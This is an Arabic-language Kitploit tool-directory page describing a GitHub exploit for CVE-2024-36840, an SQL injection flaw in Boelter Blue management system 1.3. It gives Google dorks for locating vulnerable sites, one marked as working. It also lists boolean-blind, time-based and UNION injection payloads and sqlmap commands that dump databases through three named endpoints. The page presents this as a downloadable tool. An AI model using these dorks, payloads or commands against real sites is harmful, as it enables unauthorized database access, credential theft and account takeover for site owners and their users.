Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36840-Exploit — # استغلال لـ: CVE-2024-36840: ثغرة حقن SQL في نظام إدارة Boelter Blue (الإصدار 1.3) | Kitploit
أدوات/GitHubGitHub/theexploiters/cve-2024-36840-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

# استغلال لـ: CVE-2024-36840: ثغرة حقن SQL في نظام إدارة Boelter Blue (الإصدار 1.3)

عرض المستودع
218منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-36840: ثغرة حقن SQL في نظام إدارة Boelter Blue (الإصدار 1.3)

تفاصيل الاستغلال

  • عنوان الاستغلال: ثغرة حقن SQL في نظام إدارة Boelter Blue (الإصدار 1.3)

  • دورك جوجل الأصلي: inurl:"Powered by Boelter Blue" (لم يعمل (صفر نتائج في البحث))

  • دورك جوجل بواسطة Theexploiters: intext:"Powered by Boelter Blue" (يعمل)

  • التاريخ: 2024-06-04

  • مؤلف الاستغلال: CBKB (DeadlyData, R4d1x)

  • الصفحة الرئيسية للبائع: Boelter Blue

  • رابط البرنامج: Google Play Store

  • الإصدار: 1.3

  • تم الاختبار على: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12

  • CVE: CVE-2024-36840

وصف الثغرة

تم تحديد ثغرات متعددة لحقن SQL في نظام إدارة Boelter Blue (الإصدار 1.3). تسمح هذه الثغرات للمهاجمين بحقن وتنفيذ أوامر SQL عشوائية عبر معاملات مختلفة. قد يؤدي الاستغلال الناجح إلى وصول غير مصرح به، وسرقة البيانات، واحتمال الاستيلاء على الحسابات.

المعاملات المتأثرة وتفاصيل الاستغلال:

  1. المعامل: id (GET)

    • النوع: أعمى قائم على القيم المنطقية (Boolean-based blind)
    • الحمولة: id=10071 AND 4036=4036
  2. النوع: أعمى قائم على الوقت (Time-based blind)

    • الحمولة: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. النوع: استعلام UNION

    • الحمولة: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

نقاط النهاية المعرضة للخطر

  1. news_details.php?id

    • مثال: https://www.example.com/news_details.php?id=10071
    • الاستغلال:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • مثال: https://www.example.com/services.php?section=5081
    • الاستغلال:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • مثال: https://www.example.com/location_details.php?id=836
    • الاستغلال:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

التأثير

  • وصول غير مصرح به لقاعدة البيانات: يمكن أن يؤدي الاستغلال إلى وصول غير مصرح به لقاعدة البيانات، مما يسمح للمهاجمين باستخراج معلومات حساسة.
  • تسرب البيانات: يمكن اختراق بيانات حساسة مثل بيانات اعتماد المسؤول، والمعلومات الشخصية للمستخدمين، وسجل المشتريات.
  • الاستيلاء على الحسابات: يمكن للمهاجمين الاستيلاء على حسابات المستخدمين.
  • التحكم الكامل: يمكن تحقيق تحكم كامل في التطبيق المتأثر، مما يؤدي إلى تداعيات أمنية خطيرة.

الاعتمادات

  • المكتشفون: CBKB (DeadlyData, R4d1x)

المراجع

  • تقرير ثغرة CyberDepot
  • CVE-2024-36840

Repo View Counter

تنزيل الأداة